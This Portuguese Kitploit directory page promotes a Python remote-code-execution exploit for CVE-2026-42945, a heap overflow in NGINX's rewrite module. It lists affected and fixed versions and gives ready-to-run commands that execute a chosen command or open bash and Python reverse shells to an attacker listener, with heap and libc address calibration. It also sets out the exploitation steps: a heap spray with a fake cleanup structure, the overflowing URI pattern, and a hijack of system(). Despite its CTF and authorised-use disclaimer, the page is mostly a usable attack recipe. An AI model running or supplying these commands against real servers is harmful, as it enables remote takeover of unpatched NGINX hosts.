Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-42945-Reverse-Shell-POC — Python RCE PoC com ouvinte de reverse shell para CVE-2026-42945 (NGINX Rift) | Kitploit
Ferramentas/GitHubGitHub/sec-sys/cve-2026-42945-reverse-shell-poc
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoRed TeamingFerramenta de Acesso RemotoExploração de Binários
GitHubsec-sys/cve-2026-42945-reverse-shell-poc

CVE-2026-42945-Reverse-Shell-POC

Python RCE PoC com ouvinte de reverse shell para CVE-2026-42945 (NGINX Rift)

Ver Repositório
16há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-42945 (NGINX Rift) PoC de RCE com Reverse Shell

Prova de conceito de execução remota de código para CVE-2026-42945, um estouro de buffer de heap no ngx_http_rewrite_module do NGINX. Este fork estende o PoC de gatilho público com um ouvinte de reverse shell embutido e parâmetros de exploração configuráveis para CTF e ambientes de laboratório isolados.


Resumo da Vulnerabilidade

  • ID CVE: CVE-2026-42945
  • Pseudônimo: NGINX Rift
  • Componente Afetado: ngx_http_rewrite_module
  • Versões Afetadas: NGINX Open Source 0.6.27 – 1.30.0; NGINX Plus R32 – R36
  • Versões Corrigidas: NGINX Open Source 1.30.1 / 1.31.0; NGINX Plus R36 P4, R35 P2, R32 P6
  • Causa Raiz: Incompatibilidade do mecanismo de script de duas passagens. A passagem de cálculo de comprimento é executada em um sub-mecanismo novo com is_args = 0, enquanto a passagem de cópia é executada no mecanismo principal com is_args = 1, invocando ngx_escape_uri(..., NGX_ESCAPE_ARGS). Bytes escapáveis se expandem para 3 bytes cada, transbordando um buffer de heap subdimensionado com dados URI controlados pelo atacante.
  • Pré-requisitos para RCE: Configuração rewrite/set vulnerável usando capturas PCRE sem nome ($1, $2) mais ? na string de substituição; ASLR desabilitado ou endereços base de heap/libc conhecidos; capacidade de pulverizar o heap via corpos de POST.

Arquivos

ArquivoDescrição
cve_2026_42945_rce_poc.pyExploit em Python com ouvinte de reverse shell embutido e modos de execução de comandos.

Requisitos

  • Python 3.8+
  • Instância NGINX alvo correspondente à versão vulnerável e perfil de configuração.
  • Acessibilidade de rede à porta HTTP alvo.
  • Para reverse shell: o host atacante deve ser acessível a partir do alvo na porta do ouvinte escolhida.

Uso

Executar um comando único

python3 cve_2026_42945_rce_poc.py \
  --host 10.0.0.5 \
  --port 80 \
  --cmd "id > /tmp/pwned"

Iniciar um reverse shell (bash padrão)

python3 cve_2026_42945_rce_poc.py \
  --host 10.0.0.5 \
  --port 80 \
  --shell \
  --listen-ip 10.0.0.1 \
  --listen-port 1337

Payload de reverse shell em Python

python3 cve_2026_42945_rce_poc.py \
  --host 10.0.0.5 \
  --port 80 \
  --shell \
  --shell-type python \
  --listen-ip 10.0.0.1 \
  --listen-port 1337

Calibrar endereços para um alvo específico

python3 cve_2026_42945_rce_poc.py \
  --host 10.0.0.5 \
  --port 80 \
  --shell \
  --listen-ip 10.0.0.1 \
  --listen-port 1337 \
  --heap-base 0x555555659000 \
  --libc-base 0x7ffff77ba000 \
  --system-offset 0x50d70

Como Funciona

  1. Heap Spray: Enviar múltiplas requisições POST com corpos contendo uma estrutura ngx_pool_cleanup_s falsa: system@libc | ponteiro para o comando | null. Esses corpos ocupam locais estáveis do heap.
  2. Disparar Overflow: Enviar uma requisição GET maliciosa para um endpoint rewrite vulnerável. O padrão URI é:
    /api/<349 x 'A'><969 x '+'><6-byte heap address>
    
    O overflow corrompe o ponteiro cleanup de um ngx_pool_t adjacente.
  3. Execução de Código: Quando o pool é destruído, o ponteiro cleanup corrompido invoca system(comando), executando o comando controlado pelo atacante dentro do processo worker do NGINX.
  4. Reverse Shell: Se --shell for usado, o comando é um payload de reverse shell e o ouvinte embutido captura a conexão de entrada.

Aviso de Segurança

Esta ferramenta destina-se a:

  • Exercícios CTF e de laboratório.
  • Testes de penetração autorizados com permissão por escrito.
  • Pesquisa de segurança e atividades de endurecimento de defesa.

Não use em sistemas que você não possui ou para os quais não tenha permissão explícita para testar.


Licença

Use por sua conta e risco. O autor não é responsável pelo uso não autorizado ou ilegal.


Atribuição

Pesquisa de vulnerabilidade original e PoC por depthfirstdisclosures (https://github.com/depthfirstdisclosures/nginx-rift). Este fork de reverse shell em Python foi criado para uso em laboratório de equipe vermelha / CTF.


Referências

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-42945
  • NGINX Security Advisories: https://nginx.org/en/security_advisories.html
  • F5 / NGINX Knowledge Base: https://my.f5.com/manage/s/article/K000161019
  • Repositório de pesquisa original: https://github.com/depthfirstdisclosures/nginx-rift
Baixar ferramenta